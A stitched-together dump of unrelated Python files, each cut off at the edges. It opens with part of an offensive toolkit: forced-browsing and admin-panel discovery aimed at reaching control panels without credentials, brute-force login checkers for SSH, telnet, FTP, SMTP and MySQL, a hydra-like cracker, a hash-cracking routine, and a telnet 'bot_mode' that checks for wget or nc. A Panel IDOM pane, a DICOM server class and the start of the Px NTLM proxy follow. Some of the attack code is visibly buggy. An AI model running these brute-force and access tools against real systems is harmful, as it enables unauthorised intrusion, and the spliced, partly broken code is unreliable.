if ("Uncaught exception" not in r.text) and ("404 Not Found" not in r.text) and ('could not be found' not in r.text):
self.finish=True
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
self.result.update({u:g})
break
else:
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
else:
if self.logs==True:
sys.stdout.write("\rStats: {}/{} | Found: {} ".format(manager.index(g),len(manager),self.finish))
sys.stdout.flush()
except KeyboardInterrupt:
break
except Exception as e:
pass
self.finish=True
def done(self):
return self.finish
class force_browsing:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,timeout=10,threads_daemon=True,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
'''
this function is using "Forced Browsing" technique which is aim to access restricted areas without providing any credentials!!!
it is used here to gain access to admin control panel by trying different possible combinations of links with the given URL.
it's possible to do that and this a proof of concept that unserured cpanels with lack of right sessions configurations can be
accessed just by guessing the right links :)
the function takes those arguments:
u: the targeted link which should be leading to the control panel, example:
http://www.example.com/admin/login.php
you have to delete 'login.php' and insert the rest of the link in the function like this:
>>>import bane
>>>bane.force_browsing('http://www.example.com/admin/')
then the function will try to find possible accesseble links:
http://www.example.com/admin/edit.php
http://www.example.com/admin/news.php
http://www.example.com/admin/home.php
timeout: (set by default to 10) timeout flag for the request
logs: (set by default to: True) showing the process of the attack, you can turn it off by setting it to: False
returning: (set by default to: False) return a list of the accessible link(s), to make the function return the list, set to: True
mapping: (set by default to: True) find all possible links, to make stop if it has found 1 link just set it to: False
ext: (set by default to: "php") it helps you to find links with the given extention, cuurentky it supports only 3 extentions: "php", "asp" and "aspx"( any other extention won't be used).
'''
self.stop=False
self.finish=False
self.result={}
self.logs=logs
t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
l=[]
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
for x in innerl:
if self.stop==True:
break
g=u+x+'.'+ext
if self.logs==True:
print("[*]Trying:",g)
try:
if proxy:
proxy=proxy
if proxies:
proxyrandom.choice(proxies)
if user_agent:
us=user_agent
else:
us=random.choice(ua)
h=access(g,user_agent=us,cookie=cookie,proxy=proxy)
except KeyboardInterrupt:
break
if h==True:
l.append(g)
if self.logs==True:
print("[+]FOUND!!!")
else:
if self.logs==True:
print("[-]Failed")
self.result={u:l}
self.finish=True
def done(self):
return self.finish
class admin_panel_finder:
__slots__=["stop","finish","result","logs"]
def done(self):
return self.finish
'''
this function use a list of possible admin panel links with different extensions: php, asp, aspx, js, /, cfm, cgi, brf and html.
ext: (set by default to: 'php') to define the link's extention.
usage:
>>>import bane
>>>bane.admin_panel_finder('http://www.example.com',ext='php',timeout=7)
>>>bane.admin_panel_finder('http://www.example.com',ext='aspx',timeout=5)
'''
def __init__(self,u,logs=True,threads_daemon=True,user_agent=None,cookie=None,ext='php',timeout=10,proxy=None,proxies=None):
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,timeout,logs,ext,user_agent,cookie,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,timeout=10,logs=True,ext='php',user_agent=None,cookie=None,proxy=None,proxies=None):
links=[]
ext=ext.strip()
if ext.lower()=="php":
links=phpl
elif ext.lower()=="asp":
links=aspl
elif ext.lower()=="aspx":
links=aspxl
elif ext.lower()=="js":
links=jsl
elif ext=="/":
links=slashl
elif ext.lower()=="cfm":
links=cfml
elif ext.lower()=="cgi":
links=cgil
elif ext.lower()=="brf":
links=brfl
elif ext.lower()=="html":
links=htmll
k=[]
for i in links:
if self.stop==True:
break
try:
if proxy:
proxy={'http':'http://'+proxy,'https':'http://'+proxy}
if proxies:
prx=random.choice(proxies)
proxy={'http':'http://'+prx,'https':'http://'+prx}
if user_agent:
us=user_agent
else:
us=random.choice(ua)
hed={'User-Agent': us}
if cookie:
hed.update({"Cookie":cookie})
if u[len(u)-1]=='/':
u=u[0:len(u)-1]
g=u+i
if self.logs==True:
print("[*]Trying:",g)
r=requests.get(g,headers = hed,allow_redirects=False,proxies=proxy,timeout=timeout, verify=False)
if r.status_code == requests.codes.ok:
if self.logs==True:
print("[+]FOUND!!!")
k.append(g)
else:
if self.logs==True:
print("[-]failed")
except KeyboardInterrupt:
break
except Exception as e:
if self.logs==True:
print ("[-]Failed")
self.result={u:k}
self.finish=True
'''
the next functions are used to check the login credentials you provide, it can be used for bruteforce attacks.
it returns True if the given logins, else it returns False.
example:
>>>host='125.33.32.11'
>>>wordlist=['admin:admin','admin123:admin','user:password']
>>>for x in wordlist:
user=x.split(':')[0]
pwd=x.split(':')[1]
print '[*]Trying:',user,pwd
if bane.telnet(host,username=user,password=pwd)==True:
print'[+]Found!!!'
else:
print'[-]Failed'
'''
def smtp(u, username,password,p=25,ehlo=True,helo=False,ttls=False):
try:
s= smtplib.SMTP(u, p)#connect to smtp server
if ehlo==True:
s.ehlo()#ehlo
if ttls==True:
s.starttls()#ttls
if helo==True:
s.helo()#helo
if ttls==True:
s.starttls()
s.login(username, password)
return True
except Exception as e:
pass
return False
def telnet(u,username,password,p=23,timeout=5,bot_mode=False):
try:
t=xtelnet.session()
t.connect(u,username=username,password=password,p=p,timeout=timeout)
if bot_mode==True:
a=t.execute('busybox')
t.destroy()
if bot_mode==True:
if "wget" in a or "nc" in a:
return True
return False
return True
except:
pass
return False
#why i used this code for ssh brute force instead of: pexpext/paramiko ? Well pexpect doesn't work on non-linux machines and paramiko gives a huuuuge number of false positive results ! you will see, with this code there is no false positive brute force ;)
def ssh(u,username,password,p=22,timeout=5,exchange_key=None):
if os.name == 'nt':
if exchange_key!=None:#this doesn't work on windows for some reason :(
return False
l='echo y | plink -ssh -l {} -pw {} {} -P {} "hvbjkjk"'.format(username,password,u,p)
sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE,shell=True)
else:
if exchange_key:
key="-oHostKeyAlgorithms=+"+exchange_key
else:
key=""
l="sshpass -p {} ssh {} -p {} -o StrictHostKeyChecking=no -l {} {} 'exithg'".format(password,key,p,username,u) #we use the sshpass command to send the password
sshp = subprocess.Popen(l.split(),stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
ti=time.time()
while sshp.poll() is None:
time.sleep(.1)
#print(ssh.stdout.readlines())
if int(time.time()-ti)==timeout:
try:
sshp.kill()
except:
pass
return False
ou=sshp.communicate()
try:
sshp.kill()
except:
pass
time.sleep(0.1)
if exchange_key==None:
if "Their offer:" in ou[1].decode("utf-8") :
if os.name == 'nt':
return False
k=ou[1].decode("utf-8").split("offer:")[1].strip()
return ssh(u,username,password,p=p,timeout=timeout,exchange_key=k)
if "Server refused to start a shell/command" in ou[1].decode("utf-8"):
return True
if (( "unsupported" in ou[1].decode("utf-8").lower() )or( "denied" in ou[1].decode("utf-8").lower() )or("FATAL ERROR" in ou[1].decode("utf-8")) or ("refused" in ou[1].decode("utf-8").lower()) or ("Unsupported KEX algorithm" in ou[1].decode("utf-8")) or ("Bad SSH2 KexAlgorithms" in ou[1].decode("utf-8")) ):
return False
else:
return True
def ftp_anon(ip,timeout=5):
#anonymous ftp login
try:
ftp = FTP(ip,timeout=timeout)
ftp.login()
return True
except Exception as e:
pass
return False
def ftp(ip,username,password,timeout=5):
try:
i=False
ftp = FTP(ip,timeout=timeout)
ftp.login(username,password)
return True
except Exception as e:
pass
return False
def mysql(u,username,password,timeout=5,p=3306):
try:
s=mysqlcp.session(u,username,password,timeout=timeout,port=p)
s.destroy()
return True
except Exception as e:
pass
return False
class hydra:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,p=22,protocol="ssh",word_list=[],threads_daemon=True,logs=True,exchange_key=None,timeout=5,ehlo=False,helo=True,ttls=False,proxy=None,proxies=None):
'''
this function is similar to hydra tool to bruteforce attacks on different ports.
protocol: (set by default to: ssh) set the chosen protocol (ftp, ssh, telnet, smtp and mysql) and don't forget to set the port.
'''
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies,))
t.daemon=threads_daemon
t.start()
def crack(self,u,p,protocol,word_list,logs,exchange_key,timeout,ehlo,helo,ttls,proxy,proxies):
o=''
if protocol=="telnet":
s=telnet
if protocol=="ssh":
s=ssh
if protocol=="ftp":
s=ftp
if protocol=="smtp":
s=smtp
if protocol=="mysql":
s=mysql
if protocol=="wp":
s=wpadmin
for x in word_list:
if self.stop==True:
break
user=x.split(':')[0].strip()
pwd=x.split(':')[1].strip()
if self.logs==True:
print("[*]Trying ==> {}:{}".format(user,pwd))
if protocol=="ssh":
r=s(u,user,pwd,timeout=timeout,p=p,exchange_key=exchange_key)
elif protocol=="telnet":
r=s(u,user,pwd,timeout=timeout,p=p)
elif (protocol=="mysql"):
r=s(u,user,pwd,timeout=timeout,p=p)
elif (protocol=="ftp"):
r=s(u,user,pwd,timeout=timeout)
elif (protocol=="wp"):
if proxy:
proxy=proxy
if proxies:
proxy=random.choice(proxies)
r=s(u,user,pwd,proxy=proxy,user_agent=user_agent,cookie=cookie,timeout=timeout)
elif (protocol=="smtp"):
r=s(u,p,user,pwd,ehlo=ehlo,helo=helo,ttls=ttls)
else:
r=s(u,user,pwd,timeout=timeout)
if r==True:
if self.logs==True:
print("[+]Found!!!")
o="{}:{}".format(user,pwd)
break
else:
if self.logs==True:
print("[-]Failed")
self.result={u:o}
self.finish=True
class decrypt:
__slots__=["stop","finish","result","logs"]
def __init__(self,u,word_list=[],threads_daemon=True,md5_hash=False,sha1_hash=False,sha256_hash=False,sha224_hash=False,sha384_hash=False,sha512_hash=False,base64_hash=False,caesar_hash=False,logs=False):
self.logs=logs
self.stop=False
self.finish=False
self.result={}
t=threading.Thread(target=self.crack,args=(u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_hash,caesar_hash,logs,))
t.daemon=threads_daemon
t.start()
def crack(self,u,word_list,md5_hash,sha1_hash,sha256_hash,sha224_hash,sha384_hash,sha512_hash,base64_hash,caesar_hash,logs):
if self.logs==True:
print('[!]hash: '+u+'\nbruteforcing has started!!!\n')
for x in word_list:
if self.stop==True:
break
if md5_hash==True:
if dmd5(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: md5")
self.result={u:["md5:"+x]}
break
if sha1_hash==True:
if dsha1(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha1")
self.result={u:["sha1:"+x]}
break
if sha256_hash==True:
if dsha256(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha256")
self.result={u:["sha256:"+x]}
break
if sha224_hash==True:
if dsha224(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha224")
self.result={u:["sha224:"+x]}
break
if sha384_hash==True:
if dsha384(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha384")
self.result={u:["sha384:"+x]}
break
if sha512_hash==True:
if dsha512(x,u)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: sha512")
self.result={u:["sha512:"+x]}
break
if base64_hash==True:
if base64decode(x)==u:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: base64")
self.result={u:["base64:"+x]}
break
if caesar_hash==True:
for i in range(1,27):
if dcaesar(x,i)==True:
if self.logs==True:
print("[+]Hash match found: "+x+" | Type: caesar | Key: "+str(i))
self.result={u:["caesar"+str(i)+":"+x]}
break
if self.result=={}:
if self.logs==True:
print('[-]No match found')
self.finish=True
def done(self):
return self.finish
def process_threaded(a,check_interval=0.1):
while True:
try:
if a.done()==True:
try:
return a.result
except:
pass
try:
return a.counter
except:
return
time.sleep(check_interval)
except KeyboardInterrupt:
a.stop=True
try:
return a.result
except:
pass
try:
return a.counter
except:
pass |
idom.py | import sys
import asyncio
from functools import partial
from threading import Thread
from queue import Queue as SyncQueue
from ..io.notebook import push_on_root
from ..io.resources import DIST_DIR, LOCAL_DIST
from ..io.state import state
from ..models import IDOM as _BkIDOM
from .base import PaneBase
def _spawn_threaded_event_loop(coro):
loop_q = SyncQueue()
def run_in_thread():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop_q.put(loop)
loop.run_until_complete(coro)
thread = Thread(target=run_in_thread, daemon=True)
thread.start()
return loop_q.get()
class IDOM(PaneBase):
priority = None
_updates = True
_unpack = True
_bokeh_model = _BkIDOM
def __init__(self, object=None, **params):
super().__init__(object, **params)
self._idom_loop = None
self._idom_model = {}
self.param.watch(self._update_layout, 'object')
def _update_layout(self, *args):
self._idom_model = {}
if self._idom_loop is None:
return
self._setup()
def _setup(self):
if self.object is None:
return
from idom.core.component import Component
from idom.core.layout import Layout
if isinstance(self.object, Layout):
self._idom_layout = self.object
elif isinstance(self.object, Component):
self._idom_layout = Layout(self.object)
else:
self._idom_layout = Layout(self.object())
self._idom_loop = _spawn_threaded_event_loop(self._idom_layout_render_loop())
def _get_model(self, doc, root=None, parent=None, comm=None):
from idom.core.layout import LayoutUpdate
if comm:
url = '/panel_dist/idom/build/web_modules'
else:
url = '/'+LOCAL_DIST+'idom/build/web_modules'
if self._idom_loop is None:
self._setup()
update = LayoutUpdate.create_from({}, self._idom_model)
props = self._init_params()
model = self._bokeh_model(
event=[update.path, update.changes], importSourceUrl=url, **props
)
if root is None:
root = model
self._link_props(model, ['msg'], doc, root, comm)
if root is None:
root = model
self._models[root.ref['id']] = (model, parent)
return model
def _cleanup(self, root):
super()._cleanup(root)
if not self._models:
# Clean up loop when no views are shown
try:
self._idom_loop.stop()
finally:
self._idom_loop = None
self._idom_layout = None
def _process_property_change(self, msg):
if msg['msg'] is None:
return {}
from idom.core.layout import LayoutEvent
dispatch = self._idom_layout.dispatch(LayoutEvent(**msg['msg']))
asyncio.run_coroutine_threadsafe(dispatch, loop=self._idom_loop)
for ref, (m, _) in self._models.items():
m.msg = None
push_on_root(ref)
return {}
async def _idom_layout_render_loop(self):
async with self._idom_layout:
while True:
update = await self._idom_layout.render()
self._idom_model = update.apply_to(self._idom_model)
for ref, (model, _) in self._models.items():
doc = state._views[ref][2]
if doc.session_context:
doc.add_next_tick_callback(partial(model.update, event=update))
else:
model.event = update
push_on_root(ref)
@classmethod
def applies(self, object):
from idom.core.component import Component
from idom.core.layout import Layout
if 'idom' in sys.modules:
if isinstance(object, (Component, Layout)):
return 0.8
elif callable(object):
return None
return False
@classmethod
def install(cls, packages, ignore_installed=False, fallback=None):
"""
Installs specified packages into application directory.
Arguments
---------
packages: list or tuple
The packages to install from npm
ignored_installed: boolean
Whether to ignore if the package was previously installed.
fallback: str or idom.component
The fallback to display while the component is loading
"""
import idom
import idom.client.manage
idom.client.manage.APP_DIR = DIST_DIR / 'idom'
idom.client.manage.BUILD_DIR = DIST_DIR / 'idom' / 'build'
idom.client.manage.WEB_MODULES_DIR = DIST_DIR / 'idom' / 'build' / 'web_modules'
return idom.install(packages, ignore_installed, fallback)
@classmethod
def use_param(cls, parameter):
"""
Links parameter to some IDOM state value and returns the linked
value.
Arguments
---------
parameter: param.Parameter
The parameter to link to a idom state value.
Returns
-------
An idom state value which is updated when the parameter changes.
"""
import idom
from ..depends import param_value_if_widget
parameter = param_value_if_widget(parameter)
initial = getattr(parameter.owner, parameter.name)
value, set_value = idom.hooks.use_state(initial)
def update(event):
set_value(event.new)
parameter.owner.param.watch(update, parameter.name)
return value
|
server.py | # -*- coding: utf-8 -*-
import logging
import logging.config
import time
import threading
from pynetdicom2 import uids
from . import ae
from . import config
from . import event_bus
class Server:
"""Server class itself.
Sets up event bus. Initializes all components and passes config to them.
:ivar config: server config
:ivar bus: event bus
:ivar ae: AE instance
:ivar components: all available components
"""
def __init__(self, _config: config.Config):
"""Initializes server
:param _config: server configuration
:type _config: config.Config
"""
self.config = _config
logging.config.dictConfig(self.config.log)
self.bus = event_bus.EventBus()
self.ae = None
self.components = list(self.initalize_components())
def start(self):
"""Starts the server.
Broadcasts `ON_START` and `ON_STARTED` events.
"""
self.bus.broadcast(event_bus.DefaultChannels.ON_START)
self.ae = ae.AE(self.bus, self.config.ae)
threading.Thread(target=self.ae.serve_forever).start()
# TODO: Wait for actual AE to start
self.bus.broadcast(event_bus.DefaultChannels.ON_STARTED)
def start_with_block(self):
"""Starts the server and blocks current thread."""
self.start()
try:
while True:
time.sleep(0.1)
except KeyboardInterrupt:
logging.info('Server exiting due to keyboard interupt')
except SystemExit:
logging.info('Server exiting due to SystemExit')
finally:
self.exit()
def exit(self):
"""Handles server exit.
Broadcasts `ON_EXIT` event.
"""
self.bus.broadcast_nothrow(event_bus.DefaultChannels.ON_EXIT)
self.ae.quit()
def initalize_components(self):
"""Component initialization
:yield: initializes components
:rtype: component.Component
"""
for component, _config in self.config.components.items():
is_on = _config.get('on', False)
if not is_on:
# Component is disabled
continue
factory = config.COMPONENT_REGISTRY.get(component)
if factory is None:
# TODO: add dynamic component loading
pass
component = factory(self.bus, _config)
yield component
|
px.py | "Px is an HTTP proxy server to automatically authenticate through an NTLM proxy"
from __future__ import print_function
__version__ = "0.4.0"
import base64
import ctypes
import ctypes.wintypes
import multiprocessing
import os
import select
import signal
import socket
import sys
import threading
import time
import traceback
# Print if possible
def pprint(*objs):
try:
print(*objs)
except:
pass
# Dependencies
try:
import concurrent.futures
except ImportError:
pprint("Requires module futures")
sys.exit()
try:
import netaddr
except ImportError:
pprint("Requires module netaddr")
sys.exit()
try:
import psutil
except ImportError:
pprint("Requires module psutil")
sys.exit()
try:
import pywintypes
import sspi
except ImportError:
pprint("Requires module pywin32")
sys.exit()
try:
import winkerberos
except ImportError:
pprint("Requires module winkerberos")
sys.exit()
try:
import ntlm_auth.ntlm
except ImportError:
pprint("Requires module ntlm-auth")
sys.exit()
try:
import keyring
import keyring.backends.Windows
keyring.set_keyring(keyring.backends.Windows.WinVaultKeyring())
except ImportError:
pprint("Requires module keyring")
sys.exit()
# Python 2.x vs 3.x support
try:
import configparser
import http.server as httpserver
import socketserver
import urllib.parse as urlparse
import winreg
except ImportError:
import ConfigParser as configparser
import SimpleHTTPServer as httpserver
import SocketServer as socketserver
import urlparse
import _winreg as winreg
os.getppid = psutil.Process().ppid
PermissionError = WindowsError
HELP = """Px v%s
An HTTP proxy server to automatically authenticate through an NTLM proxy
Usage:
px [FLAGS]
python px.py [FLAGS]
Actions:
--save
Save configuration to px.ini or file specified with --config
Allows setting up Px config directly from command line
Values specified on CLI override any values in existing config file
Values not specified on CLI or config file are set to defaults
--install
Add Px to the Windows registry to run on startup
--uninstall
Remove Px from the Windows registry
--quit
Quit a running instance of Px.exe
Configuration:
--config=
Specify config file. Valid file path, default: px.ini in working directory
--proxy= --server= proxy:server= in INI file
NTLM server(s) to connect through. IP:port, hostname:port
Multiple proxies can be specified comma separated. Px will iterate through
and use the one that works. Required field unless --noproxy is defined. If
remote server is not in noproxy list and proxy is undefined, Px will reject
the request
--listen= proxy:listen=
IP interface to listen on. Valid IP address, default: 127.0.0.1
--port= proxy:port=
Port to run this proxy. Valid port number, default: 3128
--gateway proxy:gateway=
Allow remote machines to use proxy. 0 or 1, default: 0
Overrides 'listen' and binds to all interfaces
--hostonly proxy:hostonly=
Allow only local interfaces to use proxy. 0 or 1, default: 0
Px allows all IP addresses assigned to local interfaces to use the service.
This allows local apps as well as VM or container apps to use Px when in a
NAT config. Px does this by listening on all interfaces and overriding the
allow list.
--allow= proxy:allow=
Allow connection from specific subnets. Comma separated, default: *.*.*.*
Whitelist which IPs can use the proxy. --hostonly overrides any definitions
unless --gateway mode is also specified
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--noproxy= proxy:noproxy=
Direct connect to specific subnets like a regular proxy. Comma separated
Skip the NTLM proxy for connections to these subnets
127.0.0.1 - specific ip
192.168.0.* - wildcards
192.168.0.1-192.168.0.255 - ranges
192.168.0.1/24 - CIDR
--useragent= proxy:useragent=
Override or send User-Agent header on client's behalf
--username= proxy:username=
Authentication to use when SSPI is unavailable. Format is domain\\username
Service name "Px" and this username are used to retrieve the password using
Python keyring. Px only retrieves credentials and storage should be done
directly in the keyring backend.
On Windows, Credential Manager is the backed and can be accessed from
Control Panel > User Accounts > Credential Manager > Windows Credentials.
Create a generic credential with Px as the network address, this username
and corresponding password.
--workers= settings:workers=
Number of parallel workers (processes). Valid integer, default: 2
--threads= settings:threads=
Number of parallel threads per worker (process). Valid integer, default: 5
--idle= settings:idle=
Idle timeout in seconds for HTTP connect sessions. Valid integer, default: 30
--socktimeout= settings:socktimeout=
Timeout in seconds for connections before giving up. Valid float, default: 20
--proxyreload= settings:proxyreload=
Time interval in seconds before refreshing proxy info. Valid int, default: 60
Proxy info reloaded from a PAC file found via WPAD or AutoConfig URL, or
manual proxy info defined in Internet Options
--foreground settings:foreground=
Run in foreground when frozen or with pythonw.exe. 0 or 1, default: 0
Px will attach to the console and write to it even though the prompt is
available for further commands. CTRL-C in the console will exit Px
--debug settings:log=
Enable debug logging. default: 0
Logs are written to working directory and over-written on startup
A log is automatically created if Px crashes for some reason
--uniqlog
Generate unique log file names
Prevents logs from being overwritten on subsequent runs. Also useful if
running multiple instances of Px""" % __version__
# Windows version
# 6.1 = Windows 7
# 6.2 = Windows 8
# 6.3 = Windows 8.1
# 10.0 = Windows 10
WIN_VERSION = float(str(sys.getwindowsversion().major) + "." + str(sys.getwindowsversion().minor))
# Proxy modes - source of proxy info
MODE_NONE = 0
MODE_CONFIG = 1
MODE_AUTO = 2
MODE_PAC = 3
MODE_MANUAL = 4
class State(object):
allow = netaddr.IPGlob("*.*.*.*")
config = None
domain = ""
exit = False
hostonly = False
logger = None
noproxy = netaddr.IPSet([])
noproxy_hosts = []
pac = ""
proxy_mode = MODE_NONE
proxy_refresh = None
proxy_server = []
proxy_type = {}
stdout = None
useragent = ""
username = ""
ini = "px.ini"
max_disconnect = 3
max_line = 65536 + 1
# Locks for thread synchronization;
# multiprocess sync isn't neccessary because State object is only shared by
# threads but every process has it's own State object
proxy_type_lock = threading.Lock()
proxy_mode_lock = threading.Lock()
class Response(object):
__slots__ = ["code", "length", "headers", "data", "body", "chunked", "close"]
def __init__(self, code=503):
self.code = code
self.length = 0
self.headers = []
self.data = None
self.body = False
self.chunked = False
self.close = False
class Log(object):
def __init__(self, name, mode):
self.file = open(name, mode)
self.stdout = sys.stdout
self.stderr = sys.stderr
sys.stdout = self
sys.stderr = self
def close(self):
sys.stdout = self.stdout
sys.stderr = self.stderr
self.file.close()
def write(self, data):
try:
self.file.write(data)
except:
pass
if self.stdout is not None:
self.stdout.write(data)
self.flush()
def flush(self):
self.file.flush()
os.fsync(self.file.fileno())
if self.stdout is not None:
self.stdout.flush()
def dprint(msg):
if State.logger is not None:
# Do locking to avoid mixing the output of different threads as there are
# two calls to print which could otherwise interleave
sys.stdout.write(
multiprocessing.current_process().name + ": " +
threading.current_thread().name + ": " + str(int(time.time())) +
": " + sys._getframe(1).f_code.co_name + ": " + msg + "\n")
def dfile():
name = multiprocessing.current_process().name
if "--quit" in sys.argv:
name = "quit"
if "--uniqlog" in sys.argv:
name = "%s-%f" % (name, time.time())
logfile = os.path.join(os.path.dirname(get_script_path()), "debug-%s.log" % name)
return logfile
def reopen_stdout():
clrstr = "\r" + " " * 80 + "\r"
if State.logger is None:
State.stdout = sys.stdout
sys.stdout = open("CONOUT$", "w")
sys.stdout.write(clrstr)
else:
State.stdout = State.logger.stdout
State.logger.stdout = open("CONOUT$", "w")
State.logger.stdout.write(clrstr)
def restore_stdout():
if State.logger is None:
sys.stdout.close()
sys.stdout = State.stdout
else:
State.logger.stdout.close()
State.logger.stdout = State.stdout
###
# NTLM support
def b64decode(val):
try:
return base64.decodebytes(val.encode("utf-8"))
except AttributeError:
return base64.decodestring(val)
def b64encode(val):
try:
return base64.encodebytes(val.encode("utf-8"))
except AttributeError:
return base64.encodestring(val)
class NtlmMessageGenerator:
# use proxy server as parameter to use the one to which connecting was successful (doesn't need to be the first of the list)
def __init__(self, proxy_type, proxy_server_address):
pwd = ""
if State.username:
pwd = keyring.get_password("Px", State.domain + "\\" + State.username)
if proxy_type == "NTLM":
if not pwd:
self.ctx = sspi.ClientAuth("NTLM", os.environ.get("USERNAME"), scflags=0)
self.get_response = self.get_response_sspi
else:
self.ctx = ntlm_auth.ntlm.NtlmContext(State.username, pwd, State.domain, "", ntlm_compatibility=3)
self.get_response = self.get_response_ntlm
else:
principal = None
if pwd:
if State.domain:
principal = (urlparse.quote(State.username) + "@" +
urlparse.quote(State.domain) + ":" + urlparse.quote(pwd))
else:
principal = urlparse.quote(State.username) + ":" + urlparse.quote(pwd)
_, self.ctx = winkerberos.authGSSClientInit("HTTP@" + proxy_server_address,
principal=principal, gssflags=0, mech_oid=winkerberos.GSS_MECH_OID_SPNEGO)
self.get_response = self.get_response_wkb
def get_response_sspi(self, challenge=None):
dprint("pywin32 SSPI")
if challenge:
challenge = b64decode(challenge)
output_buffer = None
try:
error_msg, output_buffer = self.ctx.authorize(challenge)
except pywintypes.error:
traceback.print_exc(file=sys.stdout)
return None
response_msg = b64encode(output_buffer[0].Buffer)
response_msg = response_msg.decode("utf-8").replace('\012', '')
return response_msg
def get_response_wkb(self, challenge=""):
dprint("winkerberos SSPI")
try:
winkerberos.authGSSClientStep(self.ctx, challenge)
auth_req = winkerberos.authGSSClientResponse(self.ctx)
except winkerberos.GSSError:
traceback.print_exc(file=sys.stdout)
return None
return auth_req
def get_response_ntlm(self, challenge=""):
dprint("ntlm-auth")
if challenge:
challenge = b64decode(challenge)
response_msg = b64encode(self.ctx.step(challenge))
response_msg = response_msg.decode("utf-8").replace('\012', '')
return response_msg
###
# Proxy handler
class Proxy(httpserver.SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
# Contains the proxy servers responsible for the url this Proxy instance (aka thread) serves
proxy_servers = []
proxy_socket = None
def handle_one_request(self):
try:
httpserver.SimpleHTTPRequestHandler.handle_one_request(self)
except socket.error as e:
dprint("Socket error: %s" % e)
if not hasattr(self, "_host_disconnected"):
self._host_disconnected = 1
dprint("Host disconnected")
elif self._host_disconnected < State.max_disconnect:
self._host_disconnected += 1
dprint("Host disconnected: %d" % self._host_disconnected)
else:
dprint("Closed connection to avoid infinite loop")
self.close_connection = True
def address_string(self):
host, port = self.client_address[:2]
#return socket.getfqdn(host)
return host
def log_message(self, format, *args):
dprint(format % args)
def do_socket_connect(self, destination=None):
# Already connected?
if self.proxy_socket is not None:
return True
dests = list(self.proxy_servers) if destination is None else [destination]
for dest in dests:
dprint("New connection: " + str(dest))
proxy_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
proxy_socket.connect(dest)
self.proxy_address = dest
self.proxy_socket = proxy_socket
break
except Exception as e:
dprint("Connect failed: %s" % e)
# move a non reachable proxy to the end of the proxy list;
if len(self.proxy_servers) > 1:
# append first and then remove, this should ensure thread safety with
# manual configurated proxies (in this case self.proxy_servers references the
# shared State.proxy_server)
self.proxy_servers.append(dest)
self.proxy_servers.remove(dest)
if self.proxy_socket is not None:
return True
return False
def do_socket(self, xheaders={}, destination=None):
dprint("Entering")
# Connect to proxy or destination
if not self.do_socket_connect(destination):
return Response(408)
# No chit chat on SSL
if destination is not None and self.command == "CONNECT":
return Response(200)
cl = 0
chk = False
expect = False
keepalive = False
ua = False
cmdstr = "%s %s %s\r\n" % (self.command, self.path, self.request_version)
self.proxy_socket.sendall(cmdstr.encode("utf-8"))
dprint(cmdstr.strip())
for header in self.headers:
hlower = header.lower()
if hlower == "user-agent" and State.useragent != "":
ua = True
h = "%s: %s\r\n" % (header, State.useragent)
else:
h = "%s: %s\r\n" % (header, self.headers[header])
self.proxy_socket.sendall(h.encode("utf-8"))
dprint("Sending %s" % h.strip())
if hlower == "content-length":
cl = int(self.headers[header])
elif hlower == "expect" and self.headers[header].lower() == "100-continue":
expect = True
elif hlower == "proxy-connection":
keepalive = True
elif hlower == "transfer-encoding" and self.headers[header].lower() == "chunked":
dprint("CHUNKED data")
chk = True
if not keepalive and self.request_version.lower() == "http/1.0":
xheaders["Proxy-Connection"] = "keep-alive"
if not ua and State.useragent != "":
xheaders["User-Agent"] = State.useragent
for header in xheaders:
h = ("%s: %s\r\n" % (header, xheaders[header])).encode("utf-8")
self.proxy_socket.sendall(h)
if header.lower() != "proxy-authorization":
dprint("Sending extra %s" % h.strip())
else:
dprint("Sending extra %s: sanitized len(%d)" % (header, len(xheaders[header])))
self.proxy_socket.sendall(b"\r\n")
if self.command in ["POST", "PUT", "PATCH"]:
if not hasattr(self, "body"):
dprint("Getting body for POST/PUT/PATCH")
if cl:
self.body = self.rfile.read(cl)
else:
self.body = self.rfile.read()
dprint("Sending body for POST/PUT/PATCH: %d = %d" % (cl or -1, len(self.body)))
self.proxy_socket.sendall(self.body)
self.proxy_fp = self.proxy_socket.makefile("rb")
resp = Response()
if self.command != "HEAD":
resp.body = True
# Response code
for i in range(2):
dprint("Reading response code")
line = self.proxy_fp.readline(State.max_line)
if line == b"\r\n":
line = self.proxy_fp.readline(State.max_line)
try:
resp.code = int(line.split()[1])
except (ValueError, IndexError):
dprint("Bad response %s" % line)
if line == b"":
dprint("Client closed connection")
return Response(444)
if (b"connection established" in line.lower() or
resp.code == 204 or resp.code == 304):
resp.body = False
dprint("Response code: %d " % resp.code + str(resp.body))
# Get response again if 100-Continue
if not (expect and resp.code == 100):
break
# Headers
